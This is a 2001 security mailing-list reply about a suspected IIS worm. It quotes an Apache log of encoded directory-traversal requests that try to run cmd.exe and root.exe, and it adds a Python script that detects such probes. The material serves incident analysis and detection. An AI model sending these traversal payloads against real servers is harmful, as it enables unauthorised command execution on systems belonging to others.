Re: New Worm ?

From: Andrew Sheldon (forensicsat_private)
Date: Tue Sep 18 2001 - 08:31:34 PDT


    Could this be "Code Blue"?
    Further details can be found here: 
        Code Blue targets Red China
            http://www.theregister.co.uk/content/56/21564.html
    
    shelly
    
    *********** REPLY SEPARATOR  ***********
    
    On 18/09/2001 at 09:43 Cory McIntire wrote:
    
    >Hello, 
    >I and a few others I know are getting bombarded on our machines with IIS 
    >requests....looks like another worm, and it's much smarter than before; it 
    >seems to stay within the same class A and sometimes the same class B as
    >the attacking machine is in. Here is an excerpt of what I believe is the full 
    >scan....
    >
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >
    >Just thought I would let you guys know...this one looks bad
    >fella.....thank god for Apache.....that is of course, if there isn't a huge bog down on the 
    >net....=[
    >
    >cory
    >
    >-----------------------------------------------------------------
    >This list is provided by the SecurityFocus ARIS analyzer service.
    >For more information on this free incident handling, management 
    >and tracking system please see: http://aris.securityfocus.com
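The log excerpt above is the kind of thing a defender wants to triage automatically: parse the Apache combined-format lines, undo the layered percent-encoding so that `%255c` and `%%35%63` both normalise to a backslash, flag requests that walk out of the web root or ask for `cmd.exe`/`root.exe`, and record whether each source sits in the same /8 or /16 as the scanned host (the "class A / class B" locality Cory describes). The following Python is an added example written for this page; it is not code from the original post, from SecurityFocus or from the ARIS service. The three probe lines in `SAMPLE_LOG` are copied from Cory's excerpt; the benign line and the `TARGET_HOST` address are constructed for the example.

```python
"""Flag IIS traversal / command-interpreter probes in an Apache access log.

Added example for this mailing-list page, not the post's own code.
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log format: src ident user [ts] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) '
)

# Executables every request in the excerpt reaches for, plus the traversal
# marker in raw ("..%", "../") or decoded ("..\") form.
SUSPICIOUS_TARGETS = ("cmd.exe", "root.exe")
TRAVERSAL_RE = re.compile(r'\.\.(?:/|\\|%)')

# Constructed for the example: the address of the host whose log is scanned.
TARGET_HOST = "204.120.200.10"

# Three lines copied from the post's excerpt plus one constructed benign hit.
SAMPLE_LOG = [
    '204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '10.0.0.5 - - [18/Sep/2001:09:40:00 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"',
]


def decode_path(path, rounds=3):
    """Percent-decode up to `rounds` times so double-encoded sequences such as
    %255c (-> %5c -> '\\') are normalised; stops early once nothing changes.
    Invalid UTF-8 bytes (e.g. %c1%1c) become U+FFFD rather than raising."""
    for _ in range(rounds):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            return decoded
        path = decoded
    return path


def parse_line(line):
    """Return a dict of the log fields plus the decoded path, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded"] = decode_path(entry["path"])
    return entry


def classify(entry):
    """List the reasons a request is suspicious; an empty list means benign."""
    reasons = []
    raw, decoded = entry["path"].lower(), entry["decoded"].lower()
    if any(t in decoded for t in SUSPICIOUS_TARGETS):
        reasons.append("command-interpreter request")
    if TRAVERSAL_RE.search(raw) or TRAVERSAL_RE.search(decoded):
        reasons.append("directory traversal")
    if "%c0%" in raw or "%c1%" in raw:
        reasons.append("non-canonical UTF-8 escape")
    return reasons


def network_relation(src, target):
    """Describe source locality in the post's classful terms: same /16
    ('class B'), same /8 ('class A'), or unrelated."""
    s = ipaddress.ip_address(src)
    if s in ipaddress.ip_network(f"{target}/16", strict=False):
        return "same /16"
    if s in ipaddress.ip_network(f"{target}/8", strict=False):
        return "same /8"
    return "unrelated"


def scan(lines, target):
    """Return {src: {"hits": n, "reasons": Counter, "relation": str}} for every
    source that issued at least one suspicious request."""
    report = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if not reasons:
            continue
        rec = report.setdefault(entry["src"], {
            "hits": 0, "reasons": Counter(),
            "relation": network_relation(entry["src"], target),
        })
        rec["hits"] += 1
        rec["reasons"].update(reasons)
    return report


def run_example():
    return scan(SAMPLE_LOG, TARGET_HOST)


if __name__ == "__main__":
    for src, rec in run_example().items():
        print(src, rec["hits"], rec["relation"], dict(rec["reasons"]))
```

Decoding in a loop rather than once matters: IIS of the period decoded the path twice, which is why `%255c` reached it as a backslash, and a detector that decodes only once sees `%5c` and misses the traversal. The 400 responses on the `%%35%63` lines show the server rejecting a malformed escape while the 404s show a well-formed probe against a path that does not exist on this host; both are worth counting, since the source is the same either way.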